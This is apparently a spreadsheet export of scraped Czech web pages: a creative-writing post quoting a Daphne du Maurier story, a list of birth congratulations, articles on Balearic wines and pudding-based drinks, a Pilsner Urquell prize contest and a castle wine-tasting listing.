    <t>Spisovatelská inspirace 01.11.2024 Renata Šindelářová Próza Předmětem lekcí tvůrčího psaní je vždy také četba a hodnocení textů druhých. Co se můžu od druhých naučit? Určitě ho nechci kopírovat, i když i to je perfektní cvičení. Jde spíš o pochopení principu, co je na kterém textu poutavé, čím je jedinečný. Chci si sice vytvořit svůj vlastní osobitý styl, ovšem inspiraci lze hledat na různých místech. Všímám si, přemítám, obdivuji či vylučuji vlastní cestu... Následující ukázka pochází z pera slavné autorky Daphne du Maurier (1907-1988). Úryvek z povídky Ve zlomku vteřiny ze souboru Milenec aj. povídky. Geniální, emotivní, strhující a přitom... tak obyčejně lidské. Dnes tuto knihu seženete buď v antikvariátu, nebo v knihovně. Některé povídky jsou na dnešní dobu již příliš rozvláčné, ovšem přesto chytí za srdce a pro ty, kdo se teprve psát učí nebo se zlepšují, je to široká studnice materiálů. Když paní Ellisové zemřel manžel, domnívala se, že se Susan bude chtít vrátit domů a navštěvovat denní školu, avšak k jejímu překvapení a roztrpčení byl tento návrh přijat s úlekem a dokonce slzami. „Ale já mám svoji školu ráda,“ naříkalo dítě. „Je tam taková legrace a mám tam spoustu kamarádů.“ „Skamarádíš se s jinými dětmi v denní škole,“ namítla její matka, „a pomysli na to, že bychom byly večer spolu.“ „Ano,“ odpověděla Susan nejistým hláskem, „ale co bychom dělaly?“ Paní Ellisovou to ranilo, ale nedovolila, aby Susan něco zpozorovala. „Snad máš pravdu,“ připustila, „jsi spokojená a šťastná tam, kde jsi. A pak, stejně budeme mít společné prázdniny.“Prázdniny byly jako zářivé barevné korálky na výšivce a výrazně se vyjímaly v zápisníku paní Ellisové, odsouvajíce týdny mezi nimi do pozadí. Jak deprimující byl únor, přes svých osmadvacet dní; jak skličující a nekonečný byl březen, navzdory dopolední kávě v Cosy Café, vybírání knížek v knihovně, návštěvě místního kina s přáteli nebo občas, což bylo lukrativnější, dopoledního představení „ve městě“. Pak protančil svou květinovou cestu kalendářem duben. Velikonoce a narcisky, a Susan se s rozzářenými tvářemi přihnala s jarním větrem a znovu ji objala; med k odpolednímu čaji, čajové koláčky, které upekla Grace („Ty jsi ale za vyrostla“), odpolední procházky v přírodě, slunné a radostné, protože před ní uháněla malá postavička. Květen byl klidný a červen příjemný kvůli oknům dokořán otevřeným a hledíkům v předzahrádce; červen nikam nespěchal. A kromě toho se pořádala školní divadlo na Den rodičů a Susan se zářícíma očima, i když nemluvila, hrála tak krásně, zaručeně byla nejlepší ze skřítků! Do dvacátého čtvrtého se červenec vlekl, ale potom se týdny spojily ve sled blažených událostí, které trvaly do posledního týdne září. Susan u moře… Susan na farmě...Susan v Dartmooru … Susan jen tak doma, líže zmrzlinu, vyklání se z okna. „Na svůj věk plave dobře,“ prohodila jen tak k sousedovi na pláži. „Ta vleze do vody, i když je studená.“ „Neváhám se přiznat,“ to zase ke Grace, „že se mi hrozně nechtělo jít přes to pole s býčky, ale Susan to nevadilo ani za mák. Umí to se zvířaty! Holé, poškrábané nohy v sandálech, letní šaty, z nichž vyrostla, vybledlý klobouček proti slunci, ležící na podlaze. Na říjen radši nemyslet… Ale koneckonců, v domě toho bylo hodně na práci. Na listopad je lepší zapomenout, a na déšť a mlhy, které zanechávají jinovatku na okolní přírodě. Zatáhnout závěsy, prohrábnout oheň a s něčím se k němu usadit, s týdeníkem Domácí společník, móda pro mladé. Ty růžové ne, ale tyhle zelené s nabíráním u krku a se širokou šerpou, to bude to pravé pro Susan na dýchánek o vánočních prázdninách. Prosinec… Vánoce… To bylo to nejlepší, to byl vrchol domácí radosti. Jakmile paní Ellisová zahlédla před květinářstvím první malé stromky a oranžové krabice s datlemi za výlohou u hokynáře, srdce jí radost poskočilo. Ode dneška za tři týdny bude Susan doma. Smích a povídání. Pokývnutí hlavou mezi ní a Grace. Tajuplné úsměvy. Skrytě balné dárečky. A pak je najednou po všem, jako když praskne nafouknutý balon; papírová stuha, drobná překvapení i dárky, tak pečlivě vybírané, jsou odhozeny stranou. Ale nevadí. Stálo to za to. Paní Ellisová pohlédne na spící Susan s panenkou v náručí, ztlumí světlo a odplíží se do vlastní postel, utahaná, vyčerpaná. Na jejím nočním stolku stojí panenka na vejce, Susanina ve spěchu spíchnutá školní práce. Paní Ellisová nikdy nejedla vařená vejce, ale, jak prohodila ke Grace, v tom slepičím oku je takový záblesk; je to moc šikovně udělané. Horečné tempo Nového roku. Cirkus, pantomima. Paní Ellisová pozorovala Susan, nikdy se nedívala na účinkující. „Měla byste ji vidět, jak se směje, když tuleň fouká do trumpety; nikdy dřív jsem nepoznala dítě, které se takhle dovede radovat.“ A jak se odlišovala při různých oslavách, v zelených šatečkách, se světlými vlásky a modrýma očima. Ostatní děti byly takové neohrabané. Nemotorná tělíčka a velká, beztvará ústa. „A ona řekla,Děkuji vám za krásné odpoledne’, když jsme odcházely, a to bylo víc, než udělala většina z nich. A vyhrála při škatule, hejbejte se.“ Přišly ovšem i zlé chvíle. Neklidné noci, červené tváře, bolest v krku, teplota třicet devět stupňů. Třesoucí se ruce na telefonu. Lékařův uklidňující hlas. A jeho kroky na schodech, klidný spolehlivý člověk. „Raději uděláme výtěr, pro všechny případy.“ Výtěr? Znamenalo to záškrt, spálu? Malá postavička snášená dolů, zabalená v přikrývkách, sanitka, nemocnice. Díky Bohu, ukázalo se, že je to jen katar hrtanu. Je toho kolem spousta. Příliš mnoho dýchánků, nechte ji pár dní v klidu. Ano, pane doktore, ano. Úleva z hrozné úzkosti, a pak znou a znovu bez přestávky číst Susan z její dětské ročenky, příběh za příběhem, strašné a otřepané, „a tak Nicky Nod nakonec přece ztratil svůj poklad, a to mu patřilo, že ano, děti?“ „Všechno pomine,“ pomyslela si paní Ellisová, „radost, i bolest, štěstí i utrpení. Myslím, že mí přátelé by řekli, že vedu nudný život, příliš jednotvárný, ale já jsem za něj vděčná a jsem spokojená; i když někdy cítím, že jsem nepodnikal vše, co je v lidských silách, pokud jde o chudáka Wilfreda – nebylo lehké s ním vyjít, naštěstí Susan jeho povahu nezdědila – aspoň věřím, že jsem uspěla v tom, že Susan má šťastný domov.“ Daphe du Maurier, Milenec aj. povídky Jméno: Email: Nadpis: Komentář: Vulgární a urážlivé reakce budou redakcí smazány Kontrolní otázka proti spamovacím robotům: Jaký je součin tří a čtyř? Několik posledních článků v rubrice Próza Autor: Renata Šindelářová Autor person Renata Šindelářová</t>
  </si>
  <si>
    <t>332</t>
  </si>
  <si>
    <t>289</t>
  </si>
  <si>
    <t>20241101_64_3264809674_357dfc3bf024e71b9450.html</t>
  </si>
  <si>
    <t>357dfc3bf024e71b9450</t>
  </si>
  <si>
    <t>Nejkrásnější přání k narození dítěte ❤️ Obrázky, texty, gif</t>
  </si>
  <si>
    <t>Nejkrásnější přání k narození dítěte ❤️ Obrázky, texty, gif 01.11.2024 18:22 | Autor: Dana Klomínková Sdílet Pokud přemýšlíte, jak popřát rodičům k jejich novému přírůstku, pak se můžete inspirovat v našem článku. Vybírat je možné z několika návrhů. Jednoduché přání – Pro chlapečka – Pro holčičku Dvojčata – SMS gratulace – Přání dítěti do života Vtipná přání – Vnoučata Citáty – Obrázky + GIF Foto: Freepik Přání k narození miminka – gratulace k miminku Může být něco krásnějšího než přivítat nový život na světě? Zvláště, když svým přáním potěšíte druhé ve významném období jejich života. Pokud se vám bude zdát blahopřání příliš krátké a jednoduché, připište k němu nějakou básničku, nebo citát o rodičovské lásce. Malým dárkem k přání také rozhodně neuděláte chybu. Vždy se snažte být maximálně upřímní a přání přizpůsobit konkrétní rodině a jejich situaci. Jednoduché přání k narození dítěte – text k narození miminka Srdečně blahopřejeme k narození miminka! Ať vám přináší samou radost. Přejeme, ať vaše děťátko roste jako z vody a dělá vám samou radost. Samou radost a krásné chvíle přejeme nejen vám, ale i vašemu děťátku. Nejkrásnější ze všech dárků, dává život do kočárku. V jednom z nich teď tiše dýchá vaše štěstí, vaše pýcha. Gratuluji maminko, že máš zdravé miminko. Ať v něm zdraví stále plane, nemoci se nedostane. Celý život kvete jen a splní se mu každý sen. Blahopřejeme k narození vašeho děťátka! Ať vám každý den vykouzlí úsměv na tváři. Gratulujeme k příchodu nového života! Ať vám přináší mnoho krásných chvil. Přejeme Vám, aby nový človíček přinesl do Vaší rodiny hodně lásky, smíchu a něhy. Narození miminka je jedním z nejkrásnějších okamžiků, který si zaslouží gratulaci! Přání k narození chlapečka (přání k narození syna) Mnoho krásných společných zážitků a hodně lásky, zdraví a trpělivosti s vaším malým chlapečkem přeje Gratulujeme a přejeme vašemu chlapečkovi do života jen to nejlepší, a hlavně hodně zdravíčka. František Hrubín (Maminčin dar): Když narodí se maličký, dar vidění má pod víčky, dar slyšení má v něžném oušku, dar dotyku má v prstíčkách, dar chuti pozná v prvním doušku, dar vůně v jarních kytičkách. Maminko, ty k těm darům vkrátku dar řeči přidáš nemluvňátku! Holka, nebo kluk? Do poslední chvíle to byla hádanka pro všechny vaše milé a teď se to potvrdilo, štěstíčko se narodilo. Je to krásný chlapeček, plný lásky raneček. Gratulujeme k jeho narození a přejeme hodně zdravíčka. Přání k narození holčičky (přání k narození dcery) – text přání Mnoho krásných společných zážitků a hodně lásky, zdraví a trpělivosti s vaší malou holčičkou přejí Dozvěděli jsme se zrána, že k Vám přiletěla vrána a nechala v uzlíčku krásnou malou holčičku. Ať Vám roste jako z vody a je z ní holka do nepohody, ať je veselá a zdravá a Vám jenom radost dává! Gratuluji maminko, že máš zdravé miminko. Gratuluji tatínku, že máš krásnou holčinku. Ať jí zdraví provází, vyhne se všem nesnázím. Ať má lásky dosti, navrch spoustu upřímnosti. Spoustu štěstí vinšuji, jako že se......... jmenuji. Ať je Vaše holčička krásná jako růžička, ať Vám štěstím jenom kvete, láskou na ní nešetřete. Slavík zpívá písničku, o narození uzlíčku. Co přinesl vám čáp, bez něj už nikdy nebudete usínat. Krásná je po mamince, moudrá zase po tatínkovi. Má to nejlepší z vás! Gratulujeme. Holky zrají jako víno , tak si rovnou dejte jedno na zdraví. Gratulujeme k narození holčičky! Přání k narození dvojčat Rozrostla se rodinka o dvě malá miminka. Ať se na ně svět jen směje, zdraví, štěstí, lásku přeje Dvojitá dávka štěstí dorazila! Ať vám tyto malé poklady přinášejí dvojnásobnou radost každý den. Gratulujeme k narození dvou malých zázraků! Ať vám každý den přináší radost a lásku. Dvě malá srdíčka přibyla do vaší rodiny. Přejeme vám, aby každý okamžik s nimi byl naplněný láskou a smíchem. SMS gratulace k narození dítěte Gratulujeme k Vašemu miminku. Vše nejlepší k narození potomka! Teď teprve začíná ta pravá sranda. Gratulujeme k novému přírůstku, rodinko! Gratulujeme! Ať vám malá jen kvete. ()o ()o ()o ()o Posíláme Vám pár dudlíků, budete je potřebovat. ()o Vše nejlepší k narození Vašeho drobečka, ať Vám roste do krásy a dělá jen samou legraci. o() To Vám přejí… Je to žhavá novinka, že je z tebe maminka, přeji ti vše nejlepší, k narození miminka. Hurá,hurá,hurá… Gratulujeme mamince a tatínkovi k nově nabytému štěstí! Přání do života miminku Přejeme, ať je vaše děťátko šťastné a zdravé. Přejeme miminku krásný a úspěšný život. Milý tatínku a maminko, narodilo se vám miminko. Ať vám samou radost dělá, budoucnost ho čeká skvělá. Co mu popřát do vínku? Ať se stále jenom směje, zdraví, štěstí, lásku přeje Blahopřejeme k narození miminka! Ať je jeho-její život plný pohody, lásky a štěstí. Náhle ses tu objevilo a život všech jsi změnilo, tolik štěstí ani nejde popsat, chceme s tebou radostně hopsat. Jsme tak rádi, že tě máme! Přání všeho nej posíláme. Vtipná přání k narození dítěte Gratulujeme k rozšíření rodiny! Doufáme, že už máte nachystané pleny a málo spánku. Vítejte ve světě bez spánku a plném lásky! Gratulujeme k novému šéfovi domácnosti! Už je to venku… Gratulujeme, maminko a tatínku! To nejlepší v životě, co tě potkalo maličký, jsou tvoji rodiče. Až ti budou lézt na nervy, víš za kým jít. Tvá teta a strejda Pozor, pozor! Šéf je na světě. Už se nemůžu dočkat, až vyroste a převezme vládu nad celým domem. Gratuluji vám! Váš nejnovější člen rodiny je mnohem hezčí, než vy všichni dohromady! Gratulujeme k narození holčičky-chlapečka! Pobaví tě, nenudí tě, unaví tě, přinutí tě. Kdopak je to? Je to dítě. Vzbudí tě a rozesměje, uspí tě a rozechvěje. Překvapí tě, pochopí tě, zarazí tě, zamrzí tě. Kdopak je to? Je to dítě. Nejdřív bere, pak i dává, první krůček – voláš sláva. Vše nejlepší k narození potomka! Pán Bůh stvořil muže a ženu, ale protože si to zapomněl patentovat, dělá to dneska každý BLBEC. Přání k narození vnoučete a vnučky Láska, kterou cítíme k našim vnoučatům je něco úžasného. Přeji vám, aby tohle byl začátek nového krásného období mezi vámi a vnoučetem. S láskou … Vnouče jen ten nejkrásnější dárek, který vám můžou vaše děti dát. Gratulace posílají … Být prarodičem je mnohem lepší než být rodičem. Už víte, co máte dělat a máte ještě k tomu mnohem méně práce. Velké gratulace posílají … Gratulujeme vám k narození vnoučete a přejeme, aby vás provázel smích a radost. Jsi první den na světě, všichni milujeme Tě. Srdečně vítej, náš maličký, tohle je přání od dědy a babičky. Citáty k narození dítěte Japonské přísloví: „Dítě, narozené za dne, se podobá otci, narozené v noci, matce.“ Psychiatr Thomas R. Verny: „Dnes víme, že nenarozené dítě je lidskou bytostí, která si uvědomuje a reaguje, a která vede aktivní citový život. Jak se svět chová k dítěti v děloze, tak se dítě bude později chovat ke světu.“ Japonské přísloví: „Nejdřív máme děti na rukou, potom na klíně, a nakonec na krku.“ Spisovatel Franz Kafka : „Oženit se, založit rodinu, přijmout všechny děti, jež přijdou, zachovat je na tomto nejistém světě a dokonce, bude-li to možné, je trochu vést, to je podle mého přesvědčení nejzazší meta, jíž může člověk dosáhnout.“ Spisovatel Johann Wolfgang von Goethe „Nemůžeme děti tvořit podle své vůle. Musíme je mít, milovat a vychovávat co nejlépe a jinak je nechat na pokoji.“ Spisovatelka Janice Maynardová „Kojenecký úsměv byl největším příslibem toho, že svět bude pokračovat dál, ať už s ním dospělí hrají, jak chtějí.“ Psycholog Eda J. LeShan: „Dítě je jako počátek všech věcí: zázrak, naděje, sen o možnostech. Ve světě, který kácí stromy kvůli stavbě dálnic, ztrácí půdu kvůli betonu, jsou děti téměř jediným zbývajícím pojítkem s přírodou, s přirozeným světem živých tvorů, z něhož pocházíme.“ Přání k narození dítěte – obrázky, Gif k narození miminka Obrázky související s narozením dítěte lze stáhnout zdarma například na serveru Pixabay: ZDE. Hýbající obrázky v grafickém formátu GIF si můžete vyhledat na následujících stránkách: 01.11.2024 18:22 | Autor: Dana Klomínková Poslat článek na e-mail Diskusní příspěvky vyjadřují názor jejich pisatelů a provozovatel tohoto portálu za ně nenese zodpovědnost Odpověď na otázku z obrázku: SOUVISEJÍCÍ ČLÁNKY Hledáte textová i obrázková přání k narozeninám?🥳Máme pro vás nejhezčí SMS, texty i další tipy na přání k narozeninám pro muže i ženy. Dobrou noc a sladké sny. Příliš fádní? Pak se inspirujte vybranými citáty a zamilovanými básničkami. Vtipné, klasické nebo originální přání k Valentýnu? Hledáte inspiraci, aby byl ten letošní opravdu výjimečný? Přinášíme vám nápady pro letošní... ODEBÍREJ NEJNOVĚJŠÍ NÁVODY A RECENZE Vlož email a nech si zasílat čerstvé návody, recenze a další zajímavosti Souhlasím se zpracováním osobních údajů pro účely zasílání obchodních sdělení DALŠÍ ZAJÍMAVÉ WEBY E-shop Temu : recenze E-shop Shein: recenze E-shop Fruugo: recenze E-shop Balando: recenze Šmoulí vesnice Jesenice u Rakovníka Volby a politika Aktuální volební preference Demonstrace v Praze - informace Zvýšení (valorizace) důchodů Platy státních zaměstnanců - tabulky Platy policie - tarify a tabulky Nejlepší TV seriály a pořady: Výměna manželek na TV Nova Český MasterChef na televizi Nova Jak jdou Marvel filmy po sobě V jakém pořadí sledovat Star Wars filmy Harry Potter: Jak jdou díly po sobě Seriál Zoo na Primě Survivor : Program a účasníci Návody, tipy a triky: Jak sledovat mobil partnera a dětí Tabulka časových pásem a světový čas Výpadek elektřiny? Kde jsou aktuálně odstávky Havárie vody aktuálně - kde jsou hlášené poruchy Výpadky O2 - televize, internet, mobily Význam smajlíků (emoji) a jak je napsat Kde sledovat Sport 1 a Sport 2 v TV Kdo mi volal podle čísla Moje datová schránka - přihlášení Maďarská dálniční známka – cena, nákup online Slovenská dálniční známka – placené úseky Dálniční poplatky a známka v Rakousku Poplatky na italských dálnicích Zálohování PET lahví Formule 1: program závodů, TV a live přenosy Nejlepší recepty: 7 nejlepších receptů na bábovku Recepty z rebarbory - jak na výborný koláč Recept na pečený i nepečený cheeskake Jak zavařit rajčata Koprová omáčka od babičky i od Polreicha Jak naložit kuřecí maso: nejlepší marináda Obchody a nakupování: Otevírací doba obchodů na Velikonoce Lidl – leták na tento týden Kaufland – leták na tento týden Albert – leták na tento týden Billa – leták na tento týden Pepco – leták na tento týden Globus – leták na tento týden Biedronka – leták na tento týden Rossman – leták na tento týden Mohlo by vás zajímat: Jak naladit Nova Sport 3 a Nova Sport 4 Kdo mi volal podle telefonního čísla Cesta vlakem do Chorvatska Vyzkoušejte netradiční sexuální polohy Kdo má dnes a zítra svátek? Kalendář jmen Přání k svátku – textové i obrázky Vtipné básničky k recitaci pro školy Stahování a sdílení:</t>
  </si>
  <si>
    <t>871</t>
  </si>
  <si>
    <t>3.31</t>
  </si>
  <si>
    <t>20241101_640_3239824562_051152361b87e6fa6cdf.html</t>
  </si>
  <si>
    <t>051152361b87e6fa6cdf</t>
  </si>
  <si>
    <t>Vychutnejte si jedinečná autochtonní vína z Baleárských ostrovů</t>
  </si>
  <si>
    <t>Vychutnejte si jedinečná autochtonní vína z Baleárských ostrovů Baleárské ostrovy nejsou jen rájem pro milovníky pláží a divoké přírody, ale také domovem některých z nejzajímavějších autochtonních vín, která můžete ve Středomoří ochutnat. Tato vína , vypěstovaná z odrůd, které rostou pouze na těchto ostrovech, v sobě nesou jedinečnou esenci místního terroiru a tradic. Blíže nás s nimi seznámila odbornice na vína Jaroslava Šnejdarová. Vychutnejte si jedinečná autochtonní vína z Baleárských ostrovů Co jsou autochtonní odrůdy? Autochtonní odrůdy jsou vinné révy, které pocházejí z určitého regionu a jsou tam pěstovány po staletí. Na Baleárských ostrovech najdeme několik unikátních odrůd, které se nikde jinde nevyskytují, což dává místním vínům nezaměnitelný charakter. Díky jedinečnému klimatu, půdě a lásce místních vinařů se z těchto odrůd rodí vína s osobitostí, jakou jinde nenajdete. “Baleárské ostrovy, zejména Mallorca , mají dlouhou historii vinařství, sahající až do dob starověkého Říma . Tradice pěstování vinné révy se zde předává z generace na generaci, což zajišťuje, že autochtonní odrůdy, které se zde pěstují, jsou nejen kvalitní, ale také hluboce zakořeněné v místní kultuře. Vína z těchto odrůd jsou výrazná, autentická a dokonale odrážejí terroir ostrovů,” vysvětluje Jaroslava. Na Baleárských ostrovech najdeme několik unikátních odrůd (Zdroj: edelikatesy.cz) Manto Negro Jednou z nejtypičtějších autochtonních odrůd Mallorky je Manto Negro. Tato červená odrůda je základem pro vína , která jsou bohatá na aroma červeného ovoce, koření a bylin. Vína z Manto Negro jsou často lehčího těla, ale plná chuti a s typickým středomořským šarmem. Jaroslava doporučuje vína z poměrně nového biodynamického vinařství 4Kilos: “Skvělým příkladem The Island Syndicate z produkce vinařství 4Kilos Vinícola, které využívá Manto Negro spolu s dalšími místními odrůdami, jako je Callet a Fogoneu. Toto víno je nejen oslavou autochtonních odrůd, ale také odrazem moderního přístupu k vinařství na Mallorce.” The Island Syndicate je výrazné víno s komplexní strukturou, kde se setkávají tóny zralého ovoce, bylin a koření. Zráním v dubových sudech získává víno hloubku a eleganci, která se skvěle snoubí s pokrmy z grilu nebo vyzrálými sýry. Jaroslava doporučuje vína z poměrně nového biodynamického vinařství 4Kilos (Zdroj: edelikatesy.cz) Callet Další významnou odrůdou z Mallorky je Callet. Tato červená odrůda, která se na ostrově pěstuje po staletí, přináší vínům jemnější strukturu a elegantní charakter. “ Vína z Callet jsou typická svými jemnými tóny sušeného ovoce, středomořských bylin a koření. Mají nižší obsah alkoholu , což je činí lehčími, ale přesto plnými výrazných chutí,” popisuje odbornice. Jedním z nejlepších příkladů toho, co může Callet nabídnout, je víno Anima Negra Lo Foll. Toto víno , které vyniká svou jemností a komplexností, představuje esenci Mallorky. Vzniká kombinací odrůd Callet a Manto Negro, což dává vínu jemné ovocné tóny, středomořskou bylinkovost a elegantní strukturu. Prensal Blanc Abychom nezapomněli na bílá vína , Mallorka má také svou autochtonní bílou odrůdu – Prensal Blanc. Toto svěží a aromatické víno je jako stvořené pro horké letní dny. Prensal Blanc, známý také pod jménem Moll, je charakteristický svou svěží chutí a lehkostí. Ve vínu najdete tóny citrusů, zeleného jablka a jemných květinových tónů, které jej činí velmi osvěžujícím. Výjimečným zástupcem této odrůdy je víno 4Kilos Motor Blanc. “Toto víno je skvělým příkladem, jak může být Prensal Blanc interpretován moderním způsobem. Motor Blanc kombinuje svěžest a aromatickou bohatost s komplexností a elegancí, kterou ocení nejen znalci, ale i ti, kdo hledají svěží a snadno pitelné víno ,” doporučuje Jaroslava. Je to perfektní volba k lehkým pokrmům, ale také jako aperitiv pro teplé letní večery. Autochtonní odrůdy jako výraz terroiru Autochtonní odrůdy jsou nejen důležitou součástí vinařské tradice Baleárských ostrovů, ale také klíčem k pochopení jejich terroiru – specifického spojení klimatu, půdy a místní kultury. Vína z těchto odrůd jsou opravdovým zrcadlem přírody a historie, které vám umožní nahlédnout do duše ostrovů. Každá lahev autochtonního vína z Baleárů je jako cesta časem, která vás přenese do světa, kde se tradice a příroda snoubí v jedinečnou harmonii chutí. Díky tomu jsou tato vína nejen skvělým doplňkem každého jídla, ale také fascinujícím příběhem o kraji, který je zrodil. Zdroj: edelikatesy.cz Publikováno: před týdnem , Autor: Redakce , Profil autora: Redakce Autor: primaDOMA.cz</t>
  </si>
  <si>
    <t>372</t>
  </si>
  <si>
    <t>365</t>
  </si>
  <si>
    <t>20241101_641_3239824566_711fb95d9917a1231ada.html</t>
  </si>
  <si>
    <t>711fb95d9917a1231ada</t>
  </si>
  <si>
    <t>Předvánoční soutěž o jedinečný zážitek v Pilsner Urquell: The Original Beer Experience</t>
  </si>
  <si>
    <t>Předvánoční soutěž o jedinečný zážitek v Pilsner Urquell: The Original Beer Experience Není nic lepšího než pořídit sobě nebo svým blízkým pod stromeček nezapomenutelný zážitek, na který budete vzpomínat celý život. Zapojte se do soutěže a nadělte si vánoční dárek o něco dříve. Vyhrát můžete vstupenky na interaktivní expozici Original Tour v Pilsner Urquell: The Original Beer Experience, která přibližuje příběh vzniku plzeňského piva ! Chci soutěžit Předvánoční soutěž o jedinečný zážitek v Pilsner Urquell: The Original Beer Experience Co je vaším úkolem? Vaším úkolem v této soutěži bude odpovědět správně na soutěžní otázku . Poté budete zařazeni do losování o jednu ze 3 cen od společnosti Pilsner Urquell: The Original Beer Experience . Při vyplňování soutěžního formuláře připojte jméno, svou adresu s popisným číslem, obec, PSČ, e-mail a telefonní kontakt. Zasláním těchto údajů nám zároveň dáváte souhlas, abychom v případě výhry zveřejnili vaše jméno a obec na našich internetových stránkách. Tyto údaje budou použity pouze pro účely soutěže a po jejím ukončení a vyhlášení výherců budou smazány. Děkujeme! Správné odpovědi naleznete na stránkách na www.pilsnerexperience.com/cs . Soutěžní otázky Jaké další zážitky v Pilsner Urquell: The Original Beer Experience můžete pod stromeček nadělit svým blízkým? Školu čepování a Večeři s pivním sommeliérem Komentovanou procházku “Pivní Prahou ” s degustací a Den s pivovarským sládkem Den s pivovarským sládkem a Školu čepování Osobní údaje Jméno Příjmení Město Email Telefon PSČ Ceny, o které soutěžíte 1. - 3. cena: The Original Tour V průběhu prohlídky The Original Tour se přenesete zpět v čase a na vlastní kůži prožijete příběh vzniku piva od starověku po současnost. Celá expozice tohoto netradičního muzea piva je promyšlena do nejmenších detailů a prostřednictvím nejmodernějších technologií působí od začátku do konce na všechny lidské smysly. Vyhrajte The Original Tour od Pilsneru (Zdroj: Pilsner Urquell: The Original Beer Experience) Návštěvníci zde zažijí příběh prvního zlatého ležáku na světě a prozkoumají pivovarské procesy Pilsner Urquell na vlastní kůži. Okruhem vás provede digitální audioprůvodce s detektorem pohybu, díky kterému se do expozice opravdu ponoříte všemi smysly. Součástí multimediální prohlídky je mimo jiné i 360° herní zóna a nechybí ani ochutnávka tankového piva v místní pivnici. Termíny soutěže Start: 1. 11. 2024 Uzávěrka: 24. 11. 2024 Slosování výherce: 25. 11. 2024 Zveřejnění výherce: 25. 11. 2024 Odeslání cen: nejpozději do 25. 12. 2024 Podmínky soutěže Soutěže se můžete zúčastnit pouze jednou. Pracovníci a spolupracovníci společnosti Prima DOMA MEDIA a The Original Experience company a jejich rodinní příslušníci jsou z účasti v soutěži vyloučeni. Do slosování se dostanou pouze ti soutěžící, kteří správně odpoví na všechny soutěžní otázky. Výhru nelze vyplatit v hotovosti. Pořadatel si vyhrazuje právo soutěž bez předchozího oznámení zkrátit, prodloužit či zrušit. Po slosování budou ceny výhercům zaslány e-mailem. Výherci budou vylosováni odbornou porotou společnosti Prima DOMA MEDIA. Výhry odesílá společnost Prima DOMA MEDIA. O partnerovi soutěže Pilsner Urquell: The Original Beer Experience je multimediální atrakce cílící na všechny smysly, jež představuje příběh Pilsner Urquell, nejoblíbenějšího a nejslavnějšího českého piva . Pilsner Urquell Experience se nachází v dolní části Václavského náměstí , v památkově chráněné budově bývalé Pražské úvěrní banky postavené v roce 1902. Návštěvníkům nabízí unikátní zážitek, který v České republice doposud chyběl a nabízí spoustu aktivit a zábavy. Součástí je poutavá vzdělávací expozice o historii plzeňského piva , 360° herní zóna, dále prémiový bar nebo značkový obchod Pilsner Urquell, kde je možné zakoupit originální dárky a suvenýry. Publikováno: před týdnem , Autor: Redakce , Profil autora: Redakce Autor: primaDOMA.cz</t>
  </si>
  <si>
    <t>20241101_642_3239793042_f8d44b55088845581d24.html</t>
  </si>
  <si>
    <t>f8d44b55088845581d24</t>
  </si>
  <si>
    <t>Degustace moravských vín na hradě Vildštejn – Kudy z nudy</t>
  </si>
  <si>
    <t>Degustace moravských vín na hradě Vildštejn – Kudy z nudy Tato akce již proběhla a není tedy aktuální. Prohlédněte si aktuální akce v okolí této již neaktuální akce, prozkoumejte aktuální akce v regionu Karlovarský kraj nebo navštivte Gastronomické akce v celé ČR . Setkání u dobrého vína . Na hradě Vildštejn milujeme víno ! Pravidelně proto pořádáme vinné degustace, které se konají v našem hradním sklípku. Someliér pečlivě vybírá 8 druhů vína , které pod jeho vedením v průběhu večera ochutnáte. Ke každé degustaci připravuje občerstvení hradní řezník Honza. Degustace vždy začíná v 19:00 hod.</t>
  </si>
  <si>
    <t>20241101_643_3239786783_96869c8605f085e44794.html</t>
  </si>
  <si>
    <t>96869c8605f085e44794</t>
  </si>
  <si>
    <t>Podzimní drinky tak, jak je neznáte</t>
  </si>
  <si>
    <t>Podzimní drinky tak, jak je neznáte Když se řekne puding, představí si většina z nás rychlou sladkou svačinu a také souboj o to, kdo dokáže z hrnce vyškrábat i poslední kapku této dobroty. Zkuste letos na podzim využít pudingy Dr. Oetker pro přípravu jedinečných nápojů i svačinek pro malé i velké. Podzim a začátek zimy mohou být pro mnoho lidí skoro až skličujícím obdobím, které ostře kontrastuje s letní pohodou. Přitom jde o ideální čas ke společnému setkávání, ať už při venkovních procházkách zakončených teplým nápojem a sladkým dezertem, nebo rovnou příjemným posezením s rodinou a přáteli v teple domova. Chladné a sychravé počasí konce roku přeje také tomu, abyste kromě tradičních horkých nápojů vyzkoušeli i méně obvykle kombinace chutí, které potěší děti i dospělé s mlsnými jazýčky. Netradiční chuť smetanových pudingů Kromě známých receptů, které využívají celou řadu koření jako je kurkuma, chilli, zázvor a další, můžete svou rodinu a přátele potěšit také zcela netradičním přístupem k přípravě sladkých alkoholických i nealkoholických nápojů. Jen málo lidí by napadlo, že vynikající drink pro zahřátí může vzniknout z pudingové směsi. Přitom jsou tyto nápoje nejen nápadité, ale zároveň přináší spoustu variant příchutí, takže se vám nikdy neomrzí. Malí i velcí mlsouni si zamilují karamelové teplé mléko se šlehačkou . Pro jeho přípravu přitom potřebujete pouze Karamelový puding Dr. Oetker , který záměrně uvaříte velmi řídký. Použít můžete klasické polotučné mléko, nebo se vrhnout do experimentu s mandlovým, případně jiným rostlinným mlékem. Pro slavnostní servírování budete potřebovat také vysoké sklenice, vyšlehanou smetanu coby horní vrstvu nápoje a případně také cukrové zdobení či nasekané bonbony. TIP : Pokud si chcete tento nápoj opravdu vychutnat až do dna, sáhněte po Premium Pudingu Extra Karamel Dr. Oetker , který do každé sklenice spolehlivě přidá chuť a vůni pravého karamelu. Dospělým můžete pro zahřátí připravit zábavnou variaci na svařené víno , ve které spojíte sladké bílé víno s jemnou chutí hrušek a Vanilkového pudingu Dr. Oetker . V kombinaci se skořicí a Vanilkovým cukrem Dr. Oetker se tento nápoj stane novým hitem vašeho menu pro jakékoliv podzimní či zimní setkání s přáteli. Nápoj nebo svačina? Pudingy mají mnoho podob Můžete také spojit příjemné s užitečným a svým dětem připravit lahodnou kombinaci netradičního sladkého nápoje a syté svačinky . Stačí opět připravit řidší Karamelový puding Dr. Oetker, který ale ve vysokých sklenicích smícháme s křupavým arašídovým máslem a banánem nakrájeným na plátky. Pak už jen stačí ozdobit šlehačkou, karamelovými sušenkami či mletými arašídy a snídaně či svačina šampionů je na světě. Pro přípravu chutné svačiny do školy či oblíbeného skleničkového dezertu využijete Vanilkový puding Dr. Oetker připravený podle tradičního návodu, který po vychladnutí vyšleháte s polotučným tvarohem a Vanilkovou pastou Dr. Oetker do hladkého krému. Ten pak stačí plnit do sklenic či mističek v kombinaci s piškoty, ovocem, sušenkami či dalšími oblíbenými dobrotami vaší rodiny. 